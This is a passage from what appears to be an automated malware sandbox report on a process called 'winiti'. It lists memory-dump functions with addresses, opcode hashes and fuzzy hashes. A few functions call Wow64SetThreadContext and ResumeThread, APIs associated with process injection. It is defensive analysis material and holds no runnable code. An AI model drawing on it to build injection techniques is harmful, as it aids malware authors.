                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 007235A7
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: f8bfa0c192134dd01a12c0233cb340f43b753b551a8f23aa9d8285a3e837e018
                  • Instruction ID: 48aed104255f2353a4b2cf8c15bf14501b2ae77bf6ec050b0100a2f5c11f77b1
                  • Opcode Fuzzy Hash: f8bfa0c192134dd01a12c0233cb340f43b753b551a8f23aa9d8285a3e837e018
                  • Instruction Fuzzy Hash: D341AEB4D002589FCF10CFAAD984AEEFBF1AF49314F24842AE418B7244D738AA45CF54
                  Function 007234F6 Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON
                  Download Yara Rule
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 007235A7
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 63c37a8e2d989fd554a0b5cb87de2a514d9dce202ac2c4a8e09f22fa3219c113
                  • Instruction ID: 8de1d73c56d3359e75102392b682b6eca08bc5c244b099c5401127025fe6b6b7
                  • Opcode Fuzzy Hash: 63c37a8e2d989fd554a0b5cb87de2a514d9dce202ac2c4a8e09f22fa3219c113
                  • Instruction Fuzzy Hash: 6141AFB4D002589FCF10CFAAD984AEEFBB1AF49314F24842AE418B7254D7389A45CF54
                  Function 00723408 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                  Download Yara Rule
                  APIs
                  • ResumeThread.KERNELBASE(?), ref: 00723486
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: 4a134d8668cb2bc18e48bfe296726b638f87e14f79e09b5e7c849fdd5ba9d2aa
                  • Instruction ID: def1afa4ac4193f99769bb05232f1428efffdf1104b77677e08e17a02d54f64d
                  • Opcode Fuzzy Hash: 4a134d8668cb2bc18e48bfe296726b638f87e14f79e09b5e7c849fdd5ba9d2aa
                  • Instruction Fuzzy Hash: E231BCB4D002589FCF14CFA9E984AAEFBB5AF49314F14946AE814B7300C739A945CF94
                  Function 00723406 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                  Download Yara Rule
                  APIs
                  • ResumeThread.KERNELBASE(?), ref: 00723486
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: 4af5fa1c1f848023071431e42382f8078a77d9341a259f76732fef99b3293e2a
                  • Instruction ID: 62c7ad02e8bfcddf3cf452382a7b2280e536ffa9e835bc6fc01b8473eee48201
                  • Opcode Fuzzy Hash: 4af5fa1c1f848023071431e42382f8078a77d9341a259f76732fef99b3293e2a
                  • Instruction Fuzzy Hash: 6131CDB4D002589FCF14CFA9E984AEEFBB1AF49314F24946AE814B7310C739A945CF54
                  Function 002EF4F8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID: r
                  • API String ID: 0-1812594589
                  • Opcode ID: fe0125c1bad057acb55c1a8eb803ac668a92c9fc71b6049ba62fa5fc16625620
                  • Instruction ID: 7e282c4624cf599d2f709ab2236db08a9c01c6288def981d23f19a19c4f50c26
                  • Opcode Fuzzy Hash: fe0125c1bad057acb55c1a8eb803ac668a92c9fc71b6049ba62fa5fc16625620
                  • Instruction Fuzzy Hash: 6A512670D69148DBCB84CFAAD6445EDFBBABF8D301FA0D066D41AA6221C7709951CF10
                  Function 002E3299 Relevance: .2, Instructions: 214COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7518ee76175a8187b41cb1e1ac73715aa2a201eebdcb2c25249238a86dc6ec77
                  • Instruction ID: 34a9da42127e08df24bd1bf9cc6baac40831eed868172ad05e351789f172e002
                  • Opcode Fuzzy Hash: 7518ee76175a8187b41cb1e1ac73715aa2a201eebdcb2c25249238a86dc6ec77
                  • Instruction Fuzzy Hash: F78151303047048FC705AB78D8586AEB7E2FFC9301F54892DE41A9B755DF34AE468B92
                  Function 002E32A8 Relevance: .2, Instructions: 207COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 002f5debaac0635f6a1c5a160bdc66ed31d1b21563c0ce50626ae5fb84234553
                  • Instruction ID: 38f8ae2173c5a28764caa2215d3ae84e10db8cefb58b6f7b09a822743d3743d1
                  • Opcode Fuzzy Hash: 002f5debaac0635f6a1c5a160bdc66ed31d1b21563c0ce50626ae5fb84234553
                  • Instruction Fuzzy Hash: BD814F703047048FC705AB78D4986AEB7E2FFC9301F54892DE81A9B755DF34AE468B92
                  Function 002E8C7A Relevance: .2, Instructions: 153COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d9799efd2fac7be05be2aff3a27a770ce36e341d700027f13e01ec36c9b5a55c
                  • Instruction ID: 0c427537d6b977c0474e428cd7f340b961288af7a590b9056696f38dd9d2ee3d
                  • Opcode Fuzzy Hash: d9799efd2fac7be05be2aff3a27a770ce36e341d700027f13e01ec36c9b5a55c
                  • Instruction Fuzzy Hash: 2F511F74DB5149DFCB01CFAAD8808FDBBB4BB0E340F605456D899E7355DBB098219B60
                  Function 002E8C88 Relevance: .1, Instructions: 148COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 24ac2a5e6f593313a93d610693fa2dac0747c382e9430c43361306e6ff94dc1b
                  • Instruction ID: 29c82fa8e2de75f9f44aed7605989b8ffe5f7d047ab6424f6760c6d61dd322e8
                  • Opcode Fuzzy Hash: 24ac2a5e6f593313a93d610693fa2dac0747c382e9430c43361306e6ff94dc1b
                  • Instruction Fuzzy Hash: 08510E74DB5149DFCB00CFAAD8808FDBBB8BB1D340FA05416D89AE7355DBB098219B60
                  Function 002E9801 Relevance: .1, Instructions: 131COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 809fdc70c2eed317ee66853673730bad32973bb20038c58108f04de7861812f2
                  • Instruction ID: 812db8eb1862b8899f7b608f18d9c87725c1853668331c01cf2872e7d65f2132
                  • Opcode Fuzzy Hash: 809fdc70c2eed317ee66853673730bad32973bb20038c58108f04de7861812f2
                  • Instruction Fuzzy Hash: 65411974DAA298DFCF14CFA6D840AECBBB9FF4A310FA45016E409B7261C7709995DB00
                  Function 002E8B3A Relevance: .1, Instructions: 119COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 02964f76c39c77b8b2c9ded7952c2d3a20c59937a3193baca4d44ed9d3d9851a
                  • Instruction ID: 6e9be7d9cb3352b08878587db2e26699454f1a2f1ae69e1cb9125c96617718fd
                  • Opcode Fuzzy Hash: 02964f76c39c77b8b2c9ded7952c2d3a20c59937a3193baca4d44ed9d3d9851a
                  • Instruction Fuzzy Hash: 184130709A9558CFC704CF5BD8849BDBBB8BF4E304B91A496C09DDB226DB709425DB10
                  Function 002E8B48 Relevance: .1, Instructions: 114COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d30b3a4fa62b645c5bbbe0235b8cd8c5d15da36568db0beba1a074c6e7231660
                  • Instruction ID: 8696663a0bedda57167f7d004b2a669c3f8adf69765ace8b99c2b20fc18e46da
                  • Opcode Fuzzy Hash: d30b3a4fa62b645c5bbbe0235b8cd8c5d15da36568db0beba1a074c6e7231660
                  • Instruction Fuzzy Hash: AF413DB0EB9559CFC704CF5BD8849BDB7F8BB4E304BA1A496C09D9B226DB709421DB10
                  Function 002EAB70 Relevance: .1, Instructions: 105COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 44e9acb250df4492c46fe320080490c6978d4014da256c1c54d853f9962d086c
                  • Instruction ID: 6ec739820e3a37500406542bb84d49ce78e2d70814c0b64992552bfeeb1de2fb
                  • Opcode Fuzzy Hash: 44e9acb250df4492c46fe320080490c6978d4014da256c1c54d853f9962d086c
                  • Instruction Fuzzy Hash: DF41A271A001089FDB45EBA9D8557BF7BB6FF88310F108066E519A7349DB306E41DFA2
                  Function 002EAB80 Relevance: .1, Instructions: 98COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cda709e10ce0054185da29beb5f7cb51d32994d49299573044588e2746228056
                  • Instruction ID: 413e1de1522dfacdd31536ba641a51c15d9b026aba547fa94cef0117efb549f1
                  • Opcode Fuzzy Hash: cda709e10ce0054185da29beb5f7cb51d32994d49299573044588e2746228056
                  • Instruction Fuzzy Hash: 72319E71A001089FDB45EBA9D855ABFB7B6FB88310F108029E519A3348DB306E41DFA2
                  Function 0018D01C Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443578573.000000000018D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0018D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_18d000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3b7d92f307a125cfc2905cb53d2b633d40ad9e34c9989cf427c1d30beeb2e6e3
                  • Instruction ID: 7dd8910d9289ad4065159003800ad1ca79add362d5f98843a0f3ad477cfb23f0
                  • Opcode Fuzzy Hash: 3b7d92f307a125cfc2905cb53d2b633d40ad9e34c9989cf427c1d30beeb2e6e3
                  • Instruction Fuzzy Hash: B721B075604340EFDB15EF14E8C4B26BB65EB84314F34C5A9E8494B286C736D947CFA1
                  Function 0018D1D4 Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443578573.000000000018D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0018D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_18d000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6268f0845b9b5d378c4ba31c9ccaa81312780d158b137628b329346f827724e4
                  • Instruction ID: cafa0cb653f561f3774a7ffb12072baa1313361e99dae1dae46e2f8652598896
                  • Opcode Fuzzy Hash: 6268f0845b9b5d378c4ba31c9ccaa81312780d158b137628b329346f827724e4
                  • Instruction Fuzzy Hash: 8221F2B1604340EFDB05EF14E9C0B26BBA2FB84314F24C6A9E8494B286C336D946CF61
                  Function 002EB2D8 Relevance: .1, Instructions: 65COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fe6bbe7cb683b0040f0361a8e12ab1f7346303d09c9a6031f260a3388d17f7d8
                  • Instruction ID: 8fefa5899ce60208ae95eb37fbf0f86dce680c0a3c135d82427b0c1f78edbc43
                  • Opcode Fuzzy Hash: fe6bbe7cb683b0040f0361a8e12ab1f7346303d09c9a6031f260a3388d17f7d8
                  • Instruction Fuzzy Hash: 6921D230745280DFC3079F69D81575A7BB2AF86300F99C0E7D5099B2A6DB359D01CB92
                  Function 002EE588 Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 10891ba37e137ee95754f51e7abf029a4ffafef528cca9cfe2b787cc5a588de1
                  • Instruction ID: 1d9d4f11b912aa0ed52aa03acd03f35efef722bd7e75f20fdc7f9d917e4e7244
                  • Opcode Fuzzy Hash: 10891ba37e137ee95754f51e7abf029a4ffafef528cca9cfe2b787cc5a588de1
                  • Instruction Fuzzy Hash: FC212CB4D24109DFCB40DF9AC1809AEBBFAFB48304FA19055D809A7311D770AE40CFA1
                  Function 002EB2B0 Relevance: .1, Instructions: 55COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4591d81c85e928079010782846da9b1cbc4c2808746b81b8823aa565feee5774
                  • Instruction ID: ec5b7c05dde4dd8ca88e1278789df8cb0c88908994f8166f132e60cf29aef0a4
                  • Opcode Fuzzy Hash: 4591d81c85e928079010782846da9b1cbc4c2808746b81b8823aa565feee5774
                  • Instruction Fuzzy Hash: FE11A030A4A280CFD3079B259815B6A7B32AF96300F5980E7D51A9F2A7CB689C45CB42
                  Function 002E93C2 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 01057c23787aa16458051c3a27c3b092763f3ef10e51757382be5276bee476d0
                  • Instruction ID: 14fe95936fa902a8465cfb91146e2321292fd86783a70e8d34b3c23a72c91878
                  • Opcode Fuzzy Hash: 01057c23787aa16458051c3a27c3b092763f3ef10e51757382be5276bee476d0
                  • Instruction Fuzzy Hash: EE110674D59388CBDB04CF66C4447EDFBBAAF8A300F64D0ABC4191B292D7B04446CB81
                  Function 0018D1CF Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443578573.000000000018D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0018D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_18d000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                  • Instruction ID: c37aee7784abc3e72eb1b1536ddce9e6b81572f229d8bef4001686bbf8cda51d
                  • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                  • Instruction Fuzzy Hash: B0118B75904280DFDB12DF14D5C4B15BBA2FB84314F28C6ADD8494B696C33AD94ACFA2
                  Function 0018D017 Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443578573.000000000018D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0018D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_18d000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                  • Instruction ID: cab5607b511fb3ce077a501e6ac4f9d4bcbfdae65679ef6d5c00ec715593974c
                  • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                  • Instruction Fuzzy Hash: 55118E75504380DFDB11DF14E5C4B15BB61EB44314F24C6A9E8494B696C33AD94ACFA1
                  Function 002E9348 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ccb1a0f958ea79805073fbb421a9c2cf664485ebf5cb86c21c070d805773249
                  • Instruction ID: f66b473b256167a59e095e26458a3f42a0cb4571b3b95c509d8b54753148dea2
                  • Opcode Fuzzy Hash: 2ccb1a0f958ea79805073fbb421a9c2cf664485ebf5cb86c21c070d805773249
                  • Instruction Fuzzy Hash: 7D11C474D593848FDB05CF6AC4147EDBBBAAF8A300F449097C4595B396D7B44485CF90
                  Function 002E8E42 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3c4495bfc96ddfbcdce59057c2d145885aa6eb890f5b7b9afcd268f93de33c97
                  • Instruction ID: b758449eabbd628a64d3384a2d18c17243e21be2397e0f30fe3d18eb7a8cb678
                  • Opcode Fuzzy Hash: 3c4495bfc96ddfbcdce59057c2d145885aa6eb890f5b7b9afcd268f93de33c97
                  • Instruction Fuzzy Hash: 2AF022309A91C8DFCB160B6AE8242F97F3D9B8B301FA811A7D08DA32A1CA704525DB11
                  Function 002E9358 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f6a5248f0f712b877d1b6227a8ada001149958bc4263ee505d77ed9e0d56076
                  • Instruction ID: 5a0c5e9fd8009c5e43e31213359741320f591e732b9d7aced5eacc8c91f20fcd
                  • Opcode Fuzzy Hash: 4f6a5248f0f712b877d1b6227a8ada001149958bc4263ee505d77ed9e0d56076
                  • Instruction Fuzzy Hash: 4F012C74D69348DBDB08CF67C4047EEBBBAAB8A300F50D06B841967395DBB45585CF90
                  Function 002E4820 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 319924439b4a6e2fd0e786709b4290ab01565f5cf1e22846058a2e1d137ba67a
                  • Instruction ID: 0a0caac4b0238540c7877de12820c81a6f3eda2368b76dcd4ad2e46c13905b0a
                  • Opcode Fuzzy Hash: 319924439b4a6e2fd0e786709b4290ab01565f5cf1e22846058a2e1d137ba67a
                  • Instruction Fuzzy Hash: F301817144E3C49FCB03DBB98820098BFB59E5721074945D7D4D4CB263DA215A5AD792
                  Function 002EF948 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6808f1882df75f450908b0a13c7f06e83fa3ab0fba5aa2374b906e72cf0359cf
                  • Instruction ID: cd68f9026316e562d13ea17e7c80af1e681086bdc29bb2cb207fb59ab904fe0b
                  • Opcode Fuzzy Hash: 6808f1882df75f450908b0a13c7f06e83fa3ab0fba5aa2374b906e72cf0359cf
                  • Instruction Fuzzy Hash: 8901E834A54248EFC744DFA9DA84AADBBF5EB8D300F65C0A5E44897366D730DE10EB40
                  Function 002E0839 Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4312b5b9711ebfb0b32cd082c44a89abd7a4d57d627230564ab3905aaa76735c
                  • Instruction ID: 5c4db89f1abba18f46dd877be991ce807393962212913b9e1210bd4b28b3bccb
                  • Opcode Fuzzy Hash: 4312b5b9711ebfb0b32cd082c44a89abd7a4d57d627230564ab3905aaa76735c
                  • Instruction Fuzzy Hash: 9EF0206049628D8FCB05EBB5C95262D3AB58B42300F4418EEE006A3192DE318E18D798
                  Function 002E0918 Relevance: .0, Instructions: 30COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f2f2de125aca1578124aed237dbb93bce0b4a715a471ae6f0ec04311ffdc603e
                  • Instruction ID: 1b53575210189d20c2d485bbb9328b27c7dbaff449a2f69124a95a54207f44ca
                  • Opcode Fuzzy Hash: f2f2de125aca1578124aed237dbb93bce0b4a715a471ae6f0ec04311ffdc603e
                  • Instruction Fuzzy Hash: 06F0A03084A2C89FC302DF7699A1AA9BF709F43300F4901DEC088A71B3D6740E55CF21
                  Function 002E0848 Relevance: .0, Instructions: 26COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b4de8afa2902b72d5925974b22098bf17d89b7c9c09043432d19179fa9f548bd
                  • Instruction ID: 361ec42f40963a86a3b049bd27560818988b70b8633df28c33ea32f793c9ee27
                  • Opcode Fuzzy Hash: b4de8afa2902b72d5925974b22098bf17d89b7c9c09043432d19179fa9f548bd
                  • Instruction Fuzzy Hash: 99E0DF3095214D9BCB14EFB4C952A2E72B9DB82300F4028A8E406A3280DE309E50D794
                  Function 002E0484 Relevance: .0, Instructions: 25COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1f19aa2f5a9adf980bbf8f0d52ce11754b1dfdf77b477787f8b1f7daa22aac4
                  • Instruction ID: d0bfa5c7c354a83cddc66642763c39aa0ea773c3088e28eb6476337a87a3e018
                  • Opcode Fuzzy Hash: e1f19aa2f5a9adf980bbf8f0d52ce11754b1dfdf77b477787f8b1f7daa22aac4
                  • Instruction Fuzzy Hash: DCE0D87099210CDBD314EF5AE691B6DB3B5DF45300FD010A8E00863252DB704E50CB50
                  Function 002E4DA0 Relevance: .0, Instructions: 25COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ccda9aab0f925500e958c1debadaf83fd1bfd4da76254a7dd39c40ece51d397b
                  • Instruction ID: b8b2fdcdc61849b3f275642f4d2f81e1008149bea02a9544961d8fa2f9f96af0
                  • Opcode Fuzzy Hash: ccda9aab0f925500e958c1debadaf83fd1bfd4da76254a7dd39c40ece51d397b
                  • Instruction Fuzzy Hash: CFE04F363011149B83497779B81856F7B9FEBC9721B148026E906C3358DE349D424BA2
                  Function 002E3AF0 Relevance: .0, Instructions: 24COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dc090a9fe57d536755d2cd1f61ff31072654422beaacb5baca61a813069fc844
                  • Instruction ID: bfc060aec6fe2df6a5a1e0ce6987a6d66529cc1aa36e3f9c9df6cdaefc605d92
                  • Opcode Fuzzy Hash: dc090a9fe57d536755d2cd1f61ff31072654422beaacb5baca61a813069fc844
                  • Instruction Fuzzy Hash: 4EE04F7584E288AFC742CBBC5D605D97FB99F5720071401E6D486D7223DA311A06DB62
                  Function 002E95BC Relevance: .0, Instructions: 18COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1cdff6448480842d614e6a01ce5ba883391e7d5169aac1648277f1e560ff2f74
                  • Instruction ID: 88316f3819c33ea3a90c3ff542911913ce41be75a728975142720de7a1468dd3
                  • Opcode Fuzzy Hash: 1cdff6448480842d614e6a01ce5ba883391e7d5169aac1648277f1e560ff2f74
                  • Instruction Fuzzy Hash: D3E0EC748AE384DFCB018B66D0485ACBBBCAF0B300B916083D4199B253C3B89898DE54
                  Function 002E95DA Relevance: .0, Instructions: 17COMMON
